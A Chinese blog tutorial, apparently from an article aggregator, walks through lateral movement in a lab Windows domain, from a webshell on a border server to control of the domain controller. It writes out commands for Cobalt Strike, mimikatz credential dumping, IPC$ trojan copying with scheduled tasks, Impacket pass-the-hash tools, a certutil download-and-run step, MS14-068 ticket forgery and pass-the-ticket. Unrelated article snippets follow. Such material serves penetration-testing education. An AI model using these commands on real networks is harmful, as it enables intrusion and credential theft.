当前位置: 首页 > article >正文

内网渗透之横向移动实战

在红队渗透测试中当我们通过 Web 渗透拿到边界服务器的权限后往往不会止步于此 —— 内部网络中还隐藏着更多的核心资产比如存储着企业所有账号信息的域控制器。而横向移动就是我们从边界主机出发一步步渗透到内网核心、最终拿下域控权限的核心技术。简单来说横向移动就是攻击者从一个受控主机迁移到内网中另一个主机的过程以已攻陷的主机作为跳板探测内网存活资产、收集用户凭据最终通过各种技术控制更多的远程机器直至获取核心机密数据。一、渗透环境说明在本次实战中我们面对的是一个典型的企业域环境webserver是整个网络唯一对外服务的主机只有它能够访问外网其余所有内网主机都无法出网仅支持域内通信整个域内的所有机器都由域控制器DC统一管理域控是我们的最终目标。目前我们已经通过 Web 渗透拿到了webserver的 Webshell 权限接下来我们将以此为起点完成整个内网横向渗透最终拿下域控权限。图 1内网横向渗透的网络拓扑我们以边界的 webserver 为跳板逐步渗透到内网核心二、前期准备上线与信息收集拿到 Webshell 之后我们的第一步是将主机上线到 Cobalt StrikeCS这样才能更方便地进行后续的内网操作。2.1 上线 CS Beacon首先我们通过 Webshell 上传 CS 生成的木马调用 webserver 主机运行木马让主机成功上线到 CS 的 Beacon 中此时我们就获得了这台主机的初步控制权限。2.2 域环境信息收集上线之后我们首先要做的就是摸清内网的环境收集足够的信息为后续的横向移动做准备判断是否为域环境首先我们需要确认当前主机是否加入了域这是域渗透的基础shell net time /domain如果命令成功返回了域的时间信息就说明当前主机处于域环境中。获取域控 IP 地址拿到域名之后我们可以通过 ping 命令解析出域控的 IP 地址shell ping OWA2010CN-God.god.org -4收集域内用户信息接下来我们可以收集整个域内的所有用户账号为后续的凭据利用做准备shell net user /domain内网资产扫描我们可以通过 CS 的插件扫描整个域内的网络、端口信息这些扫描结果会展示在 CS 的 #34;视图 - 目标#34; 栏目中帮助我们发现内网中存活的主机和开放的服务。 扫描中我们发现当前的 webserver 存在两个网段10\.0\.0\.0/24可以出网的边界网段192\.168\.3\.0/24无法出网的纯内网网段这就是我们接下来要渗透的目标网段2.3 提权与凭据收集要抓取内网的用户凭据我们需要先拿到主机的 System 权限因此我们需要先进行提权操作 我们可以使用 CS 的提权插件多次尝试后即可拿到 System 权限的会话此时我们就拥有了这台主机的最高权限。提权完成后我们就可以使用 mimikatz 插件抓取当前主机内存中的用户凭据了。原理说明在域环境中当域内的其他账号登录到这台主机时域验证的过程会将账号密码的哈希值暂存在主机的运行内存中mimikatz 就可以从内存中把这些凭据抓取出来。抓取完成后我们就可以在 CS 的 #34;凭据信息#34; 中看到所有在这台主机上登录过的账号、明文密码以及 NTLM 哈希值这些凭据就是我们后续横向移动的 #34;钥匙#34;。三、经典方案基于 IPC 的横向移动拿到凭据之后我们就可以开始横向移动了最经典的方式就是利用 IPC 连接来实现。3.1 什么是 IPC 连接IPCInternet Process Connection进程间通信是 Windows 提供的一种进程间通信技术通过它我们可以在两台主机之间建立通信连接而IPC$是 Windows 系统默认的隐藏共享专门用于进程间的通信。当我们通过账号密码和目标主机建立 IPC 连接之后就可以像操作本地主机一样访问远程主机的资源查看远程目录、复制文件、创建计划任务、启动系统服务等等这也是我们横向移动的基础。3.2 正向连接方式正向连接就是我们让目标主机开放一个端口我们主动去连接它具体步骤如下创建正向监听器首先在 CS 中创建一个正向连接的监听器用于接收目标主机的上线请求。生成正向木马基于这个正向监听器生成对应的木马文件保存到本地。建立 IPC 连接接下来我们使用之前收集到的管理员凭据和目标内网主机建立 IPC 连接有两种方式可以选择手动命令方式shell net use \\192.168.3.21\ipc$ Admin12345 /user:god.org\administrator插件方式直接使用 CS 的横向移动插件输入目标 IP 和账号密码一键建立连接。上传并复制木马我们先把生成的正向木马上传到当前的 webserver然后通过 IPC 连接把木马复制到目标主机的 C 盘下shell copy 4444.exe \\192.168.3.21\c$创建计划任务运行木马接下来我们查看目标主机的当前时间然后创建计划任务让目标主机在指定时间运行我们的木马对于 Windows2012 之前的系统使用at命令# 查看当前时间 shell net time # 创建计划任务12:51运行木马 shell at \\192.168.3.21 12:51 c:\4444.exe对于 Windows2012 及之后的系统使用schtasks命令shell schtasks /create /s 192.168.3.21 /ru SYSTEM /tn beacon /sc DAILY /tr c:\4444.exe /F连接目标主机完成上线等到计划任务的时间到了木马就会在目标主机上运行开放正向的连接端口我们只需要在 CS 中连接这个端口目标主机就成功上线了connect 192.168.3.21 44443.3 反向连接方式反向连接则是反过来让目标主机主动连接我们的受控主机这种方式更适合内网的防火墙限制具体步骤如下配置代理转发在 CS 的提权会话中选择 #34;代理转发 - 转发上线#34; 模块设置转发的 IP 为当前 webserver 的内网 IP因为目标主机是内网主机只能访问内网 IP。生成反向木马基于这个转发的监听器生成反向的木马文件5555\.exe。复制木马到目标主机和正向连接一样我们先把木马上传到 webserver然后通过 IPC 连接复制到目标主机的 C 盘shell copy 5555.exe \\192.168.3.21\c$创建计划任务运行木马同样我们创建计划任务让目标主机运行木马shell net time shell at \\192.168.3.21 12:20 c:\5555.exe等待上线木马运行后会主动反向连接我们的 webserver 的内网 IP然后通过 CS 的代理转发最终上线到我们的 CS 服务器这样就完成了反向的横向移动。四、高效方案Impacket 工具套件的横向渗透手动的 IPC 连接步骤比较繁琐在实战中我们更常用 Impacket 这个工具包它可以帮我们更高效地完成横向移动。4.1 什么是 ImpacketImpacket 是一个开源的网络协议工具包它实现了大量的 Windows 通信协议比如 SMB、MSRPC、WMI、LDAP 等等是红队人员做域渗透最常用的工具之一。 Impacket 的工具原本是 Python 脚本不过我们也可以把它打包成 exe 可执行文件方便在 Windows 主机上运行。图 2Impacket 工具的命令行使用效果4.2 上传工具的使用方式最基础的使用方式是把 Impacket 的工具上传到我们的受控 webserver 上然后调用它来执行命令上传工具我们把打包好的atexec\.exe上传到 webserver 上。执行远程命令然后我们就可以用它来连接目标内网主机执行任意命令既支持明文密码也支持哈希值Pass the Hash# 明文密码方式 shell atexec.exe god/administrator:Admin12345192.168.3.21 whoami # 哈希值方式不需要明文密码 shell atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 god/Administrator192.168.3.21 whoami下载并运行木马接下来我们把 CS 的木马上传到 webserver 的网站根目录然后用 atexec 让目标主机下载并运行木马# 让目标主机从webserver下载木马 shell atexec.exe god/administrator:Admin12345192.168.3.21 certutil.exe -urlcache -split -f http://192.168.3.31:80/5555.exe fan.exe # 运行木马完成上线 shell atexec.exe god/administrator:Admin12345192.168.3.21 fan.exe4.3 更优雅的方式代理转发 本地执行上传工具的方式有个缺点需要上传文件容易被杀毒软件发现。其实我们可以用 CS 的 SOCKS 代理转发直接在我们的本地攻击机上运行 Impacket 工具不需要上传任何文件到目标主机步骤非常简单在 CS 中开启 SOCKS 代理把内网的流量转发到我们的本地。在本地配置代理让我们的攻击机可以通过这个代理访问内网的主机。直接在本地的命令行运行 Impacket 工具就像目标内网主机就在我们本地一样atexec.exe god/administrator:Admin12345192.168.3.21 whoami这种方式完全不需要上传任何文件到目标主机更加隐蔽也是实战中最常用的方式。4.4 Impacket 的三个经典横向工具除了 atexecImpacket 还提供了三个非常常用的横向工具都可以通过哈希值直接连接目标主机不需要明文密码[psexec.py](psexec.py)最经典的横向工具通过 SMB 协议在远程主机上创建服务执行命令连接成功后会直接返回目标主机的命令行python3 psexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/Administrator192.168.3.21[smbexec.py](smbexec.py)和 psexec 类似同样通过 SMB 协议不过它不需要创建新的服务更加隐蔽连接后同样返回命令行python3 smbexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/Administrator192.168.3.21[wmiexe.py](wmiexe.py)通过 WMI 协议执行远程命令WMI 是 Windows 的标准管理协议很多防火墙都不会拦截因此隐蔽性更强python3 wmiexe.py -hashes :ccef208c6485269c20db2cad21734fe7 god/Administrator192.168.3.21拿到目标主机的命令行之后我们只需要像之前一样把 CS 的木马下载到目标主机运行就可以让目标主机上线到 CS 了完成横向移动。五、无密码方案票据传递PTT横向渗透如果我们没有拿到管理员的明文密码甚至连哈希值都没有那是不是就没办法横向了当然不是我们还可以用 \\票据传递Pass the TicketPTT\\技术利用 Kerberos 的票据来实现横向甚至不需要管理员权限。5.1 Kerberos 协议基础要理解票据传递我们首先要了解 Kerberos 协议它是 Windows 域环境默认的认证协议相当于域环境的 #34;登录凭证系统#34;。图 3Kerberos 协议的认证流程Kerberos 的认证流程分为三个步骤AS 认证客户端带着用户的密码哈希向 KDC密钥分发中心也就是域控的 AS 服务请求 TGT 票据AS 验证通过后会给客户端返回一个 TGT票据授予票据这个票据用来证明用户的身份有效期默认 10 小时。TGS 认证当客户端要访问某个服务的时候带着 TGT 向 TGS 服务请求 ST 服务票据TGS 验证通过后返回对应的 ST 票据。服务认证客户端带着 ST 票据访问目标服务服务验证 ST 通过后就允许客户端访问不需要再输入密码。简单来说TGT 就像是域里的 #34;身份证#34;只要你有这个身份证你就可以访问域里的所有资源不需要再输入密码。而票据传递就是我们伪造或者窃取这个 #34;身份证#34;用来冒充管理员访问域控。除此之外票据攻击还有两个经典的类型黄金票据用域内krbtgt账号的 NTLM Hash 加密伪造的 TGT 票据拥有整个域的最高权限可以访问任何资源。白银票据用服务账号的 NTLM Hash 加密伪造的 ST 票据只能访问特定的服务更加隐蔽。5.2 方法一利用 MS14-068 漏洞伪造票据MS14-068 是域控 KDC 服务的一个漏洞攻击者可以利用这个漏洞伪造一个管理员权限的 TGT 票据直接拿到域控的权限步骤如下获取当前用户的 SID首先我们查看当前用户的 SIDshell whoami /user生成伪造的票据我们使用 MS14-068 的工具用当前用户的信息伪造一个管理员权限的票据MS14-068.exe -u webadmingod.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!#45清除原有票据为了避免原有票据的影响我们先清除当前主机上所有的缓存票据# 查看当前票据 shell klist # 清除所有票据 shell klist purge导入伪造的票据然后我们用 mimikatz 把我们生成的伪造票据导入到当前主机的内存中mimikatz kerberos::ptc TGT_webadmingod.org.ccache # 查看导入后的票据 shell klist利用票据访问域控导入完成后我们就可以用这个伪造的票据直接访问域控的 C 盘共享就像域管理员一样shell dir \\owa2010cn-god\c$接下来我们就可以把木马复制到域控创建服务运行木马拿下域控的权限shell copy 5555.exe \\OWA2010CN-God\c$ shell sc \\OWA2010CN-God create bindshe binpath c:\5555.exe shell sc \\OWA2010CN-God start bindshe当然这个方法的前提是域控没有打 MS14-068 的补丁现在大部分企业的主机都已经修复了这个漏洞。5.3 方法二利用 Kekeo 工具生成票据如果我们拿到了管理员的 NTLM 哈希我们还可以用 Kekeo 工具直接生成对应的 TGT 票据不需要漏洞上传 Kekeo 工具把 Kekeo 工具上传到受控的 webserver。生成票据用我们收集到的管理员的哈希值生成对应的 TGT 票据shell kekeo tgt::ask /user:Administrator /domain:god.org /ntlm:ccef208c6485269c20db2cad21734fe7 test清除原有票据导入新票据同样我们先清除原有票据然后把生成的票据导入内存shell klist purge shell kekeo kerberos::ptt TGT_AdministratorGOD.ORG_krbtgt~god.orgGOD.ORG.kirbi test访问域控导入完成后我们就可以直接访问域控的资源了shell dir \\owa2010cn-god\c$这个方法的前提是我们拿到了正确的管理员 NTLM 哈希只要哈希正确票据就可以正常使用。5.4 方法三利用 mimikatz 导出历史票据最简单的方法如果域管理员之前登录过我们的受控主机那主机的内存里就会缓存管理员的票据我们直接把这个票据导出来用就可以了导出所有票据我们用 mimikatz 把当前主机上所有的登录票据都导出来mimikatz sekurlsa::tickets /export选择管理员的票据在导出的文件中我们找到域管理员的票据。导入票据清除原有票据然后把管理员的票据导入到当前内存中shell klist purge mimikatz kerberos::ptt C:\Users\webadmin\Desktop\[0;3e7]-0-0-40a40000-webadminldap-OWA2010CN-God.god.org.kirbi访问域控然后我们就可以直接用这个票据访问域控了shell dir \\owa2010cn-god\c$这个方法非常简单但是有两个限制一是域管理员必须登录过这台主机二是票据还在有效期内默认 10 小时有点看运气。六、总结内网横向移动是域渗透的核心环节从边界的 Webshell 到最终的域控权限我们有很多种不同的方法可以选择IPC 连接最经典的手动方式适合理解横向移动的基础原理但是步骤繁琐。Impacket 工具包实战中最高效的方式支持 Pass the Hash配合 SOCKS 代理可以做到无文件攻击隐蔽性极强。票据传递PTT无明文密码情况下的解决方案利用 Kerberos 的票据绕过密码验证在无法获取密码哈希的场景下非常有用。在实际的渗透测试中我们会根据目标的环境灵活选择不同的方法一步步从边界主机渗透到内网的核心最终拿下整个域的控制权。

相关文章:

内网渗透之横向移动实战

在红队渗透测试中,当我们通过 Web 渗透拿到边界服务器的权限后,往往不会止步于此 —— 内部网络中还隐藏着更多的核心资产,比如存储着企业所有账号信息的域控制器。而横向移动,就是我们从边界主机出发,一步步渗透到内网…...

Harness与Agent SDK的边界划分:最佳实践

Harness与Agent SDK的边界划分:最佳实践 引言 在云原生软件交付的下半场,企业面临的核心矛盾已经从「有没有工具链」变成了「能不能把工具链用出价值」。作为全球领先的软件交付平台(SDP),Harness凭借开箱即用的CI/CD、Feature Flag、混沌工程、合规治理等能力,已经成为…...

08-系统技术架构师必备——分布式系统理论与数据一致性

关键词:分布式系统、CAP定理、BASE理论、Paxos、Raft、分布式事务、TCC、Saga、一致性算法 分布式系统 CAP定理 分布式事务 一致性算法 Paxos Raft TCC Saga 系统技术架构师必备——分布式系统理论与数据一致性 摘要 分布式系统是系统技术架构师必须跨越的"分水岭"…...

Keil µVision库模块选择问题解决方案

1. 问题现象解析在Keil Vision IDE 4.53.06版本中,当用户为C51/C251/C166工具链项目添加库文件时,可以通过Options for File对话框选择需要链接的特定模块。这个功能本应记住用户的选择,使得下次打开对话框时保持相同的模块选中状态。但实际使…...

5分钟搞定视频号批量下载:开源工具让效率提升20倍

5分钟搞定视频号批量下载:开源工具让效率提升20倍 【免费下载链接】res-downloader 视频号、小程序、抖音、快手、小红书、直播流、m3u8、酷狗、QQ音乐等常见网络资源下载! 项目地址: https://gitcode.com/GitHub_Trending/re/res-downloader 你是否还在为下…...

ES 模块:JavaScript 模块化的标准方案

ES 模块:JavaScript 模块化的标准方案 什么是 ES 模块? ES 模块(ES Modules,简称 ESM)是 ECMAScript 2015(ES6)引入的官方模块化规范。 ES 模块 vs CommonJS 特性CommonJSES Modules加载方式同步…...

Python异步编程深度解析:从asyncio到实战应用

Python异步编程深度解析:从asyncio到实战应用 引言 异步编程是现代Python后端开发中不可或缺的技能。作为从Python转向Rust的后端开发者,我发现Python的异步生态非常成熟,尤其是asyncio库提供了强大的异步编程能力。本文将深入探讨Python异步…...

CI/CD最佳实践:构建高效可靠的持续集成和部署流程

CI/CD最佳实践:构建高效可靠的持续集成和部署流程 一、CI/CD最佳实践概述 1.1 CI/CD最佳实践的定义 CI/CD最佳实践是指在持续集成和持续部署过程中遵循的一系列指导原则和方法。它通过自动化、标准化和可重复的流程,提高软件开发和部署的效率和可靠性。 …...

CSS Grid布局深入解析:掌握现代布局技术

CSS Grid布局深入解析:掌握现代布局技术 引言 CSS Grid布局是CSS3引入的强大布局系统,它提供了一种二维网格布局方式,可以轻松实现复杂的页面布局。本文将深入探讨Grid布局的核心概念、高级技巧和最佳实践。 一、Grid布局基础 1.1 Grid容器与…...

回归模型.

...

小波分析多尺度数据融合算法应用【附算法】

✨ 长期致力于小波分析、多尺度数据融合、MEMS陀螺、Allan方差研究工作,擅长数据搜集与处理、建模仿真、程序编写、仿真设计。 ✅ 专业定制毕设、代码 ✅ 如需沟通交流,点击《获取方式》 (1)小波域多尺度融合定理证明与算法框架&a…...

鸿蒙PC:鸿蒙electron跨端框架PC链接雷达实战:把本地收藏夹升级成可巡检的链接管理面板

前言 欢迎加入鸿蒙PC开发者社区,共同打造开发者工具生态:鸿蒙PC开发者社区 :https://harmonypc.csdn.net/ 项目开源地址:https://AtomGit.com/lqjmac/ele_lianjieleida 浏览器收藏夹能保存链接,但不擅长保存判断。 …...

Python数据库设计模式:从ORM到数据层架构

Python数据库设计模式:从ORM到数据层架构 引言 数据库设计是后端开发的核心环节。作为从Python转向Rust的后端开发者,我发现Python的数据库生态非常成熟,尤其是SQLAlchemy提供了强大的ORM能力。本文将深入探讨Python数据库设计模式&#xff0…...

数据科学实践案例与项目管理

数据科学实践案例与项目管理 1. 技术分析 1.1 数据科学项目管理概述 数据科学项目管理是确保项目成功的关键: 项目生命周期问题定义: 明确目标数据收集: 获取数据数据处理: 清洗转换模型开发: 构建模型评估验证: 评估效果部署上线: 生产环境项目管理要素:目标设定进…...

大气层Atmosphere系统深度解析:解锁Switch潜能的终极技术指南

大气层Atmosphere系统深度解析:解锁Switch潜能的终极技术指南 【免费下载链接】Atmosphere-stable 大气层整合包系统稳定版 项目地址: https://gitcode.com/gh_mirrors/at/Atmosphere-stable Atmosphere大气层系统作为Nintendo Switch最稳定、功能最丰富的定…...

Mootdx架构深度解析:Python金融数据接口的工程化实践

Mootdx架构深度解析:Python金融数据接口的工程化实践 【免费下载链接】mootdx 通达信数据读取的一个简便使用封装 项目地址: https://gitcode.com/GitHub_Trending/mo/mootdx 在金融科技快速发展的今天,数据获取的便捷性与稳定性成为量化分析的基…...

大模型从0训练LLaMA全流程实战——基于昇腾910B集群

用昇腾集群从零训练一个 LLaMA-7B,走完数据准备、代码修改、分布式配置、启动训练、监控调优的全流程。中间踩过的坑都标注在对应步骤里。 1. 硬件与环境确认(训练前必做) 训练大模型对环境的稳定性要求极高,任何一项不达标都可能导致训练中途崩溃。 #!/bin/bash # 训练前…...

2026技术复盘:告别“易碎”代码,实在Agent重塑企业自动化底座

在2026年的数字化转型浪潮中,企业对于“提效”的追求已从单纯的工具引入转向深度的架构治理。 曾被寄予厚望的固定规则自动化脚本,在经历了数年的规模化应用后,其弊端正集中爆发。 许多企业发现,那些耗费巨资编写的脚本&#xff0…...

前缀和与差分进阶总结 | 技巧归纳与实战应用

前缀和与差分进阶总结 | 技巧归纳与实战应用 引言 前缀和与差分是数组处理中两种重要且互补的技术。它们看似简单,却在 LeetCode 和实际工程中有着广泛的应用。前缀和将区间查询从 O(n) 优化到 O(1),差分将区间更新从 O(n) 优化到 O(1)。两者的结合使用可…...

LeetCode 1314:矩阵区域和 | 二维前缀和

LeetCode 1314:矩阵区域和 | 二维前缀和 引言 矩阵区域和(Matrix Block Sum)是 LeetCode 第 1314 题,难度为 Medium。题目要求计算矩阵中以每个元素为中心、KK 子矩阵区域的元素和。这道题是二维前缀和的经典应用,展…...

LeetCode 930:和相同的二元子数组 | 前缀和与哈希表

LeetCode 930:和相同的二元子数组 | 前缀和与哈希表 引言 和相同的二元子数组(Binary Subarrays With Sum)是 LeetCode 第 930 题,难度为 Medium。题目要求在二元数组(元素只有 0 和 1)中找出子数组和等于 …...

LeetCode 1424:对角线遍历 II | 前缀和分组

LeetCode 1424:对角线遍历 II | 前缀和分组 引言 对角线遍历 II(Diagonal Traverse II)是 LeetCode 第 1424 题,难度为 Medium。题目要求按照对角线顺序遍历一个二叉树数组,返回所有对角线上的节点值。这道题展示了前缀…...

SLAM技术路线收敛?不,多模态融合正在重启路线之争

过去几年,SLAM技术路线确实呈现出明确的收敛趋势:纯视觉SLAM逐渐成熟,基于3DGS的实时建图成为新范式,激光SLAM也固化为工业场景的稳健选择。大家一度认为,算法架构的选择题已经做完。然而,多模态融合的深入…...

国曙GOSHINE正式亮相:一家人力资源服务机构的“长期主义”转向!

在人力资源行业,越来越多企业开始意识到:真正困难的,从来不是招聘,而是复杂用工环境下的长期管理。从社保合规到劳动风险,从跨区域用工到组织效率,企业面对的挑战正在不断增加。尤其在劳动密集型行业&#…...

学 Simulink—— 双定子永磁同步电机(DS‑PMSM)的协同控制与转矩提升仿真(带 MATLAB 脚本(直接运行))

目录 手把手教你学 Simulink—— 双定子永磁同步电机(DS‑PMSM)的协同控制与转矩提升仿真 🔥 前言:为什么做双定子 PMSM? 一、DS‑PMSM 结构与工作原理 1.1 基本结构 1.2 数学模型(dq 轴,含互感耦合) 二、协同控制策略:主从 FOC + 转矩叠加 2.1 控制架构(5 大…...

AI Agent Harness Engineering 在房地产中的应用:智能推荐与价值评估

AI Agent Harness Engineering 在房地产中的应用:智能推荐与价值评估 引言:房地产数字化转型的「最后一公里」——智能决策的人机协同闭环 痛点引入:千亿级赛道下的三大决策「卡脖子」难题 房地产作为全球规模最大的实体产业之一(据CBRE世邦魏理仕2024年全球房地产市场报…...

从微服务到 Agent 服务:架构思维的迁移

从微服务到 Agent 服务:架构思维的迁移与落地全指南 第一部分:引言与基础 (Introduction & Foundation) 1. 引人注目的标题 (Compelling Title) 副标题:深入解析微服务痛点、Agent服务原理、架构设计迁移路径与企业级生产实践 2. 摘要/引言 (Abstract / Introduction)…...

3层深度清理技术:Display Driver Uninstaller显卡驱动彻底卸载解决方案

3层深度清理技术:Display Driver Uninstaller显卡驱动彻底卸载解决方案 【免费下载链接】display-drivers-uninstaller Display Driver Uninstaller (DDU) a driver removal utility / cleaner utility 项目地址: https://gitcode.com/gh_mirrors/di/display-driv…...

AI系列【仅供参考】:周末用笔记本搞点大事:手把手教学部署 1.5、7B 版本 DeepSeek 智能助手

周末用笔记本搞点大事:手把手教学部署 1.5、7B 版本 DeepSeek 智能助手周末用笔记本搞点大事:手把手教学部署 1.5、7B 版本 DeepSeek 智能助手一、工具介绍1.1 DeepSeek1.2 Ollama二、准备工作2.1 系统要求2.2 下载 Ollama 安装包三、Ollama 的安装与验证…...

AI系列【仅供参考】:TRAE 支持自定义模型了,配置个 DeepSeek V4 试试

TRAE 支持自定义模型了,配置个 DeepSeek V4 试试TRAE 支持自定义模型了,配置个 DeepSeek V4 试试原因解决方案底下评论问题一:回答一:回答二:回答三:问题二:回答一:问题三&#xff1…...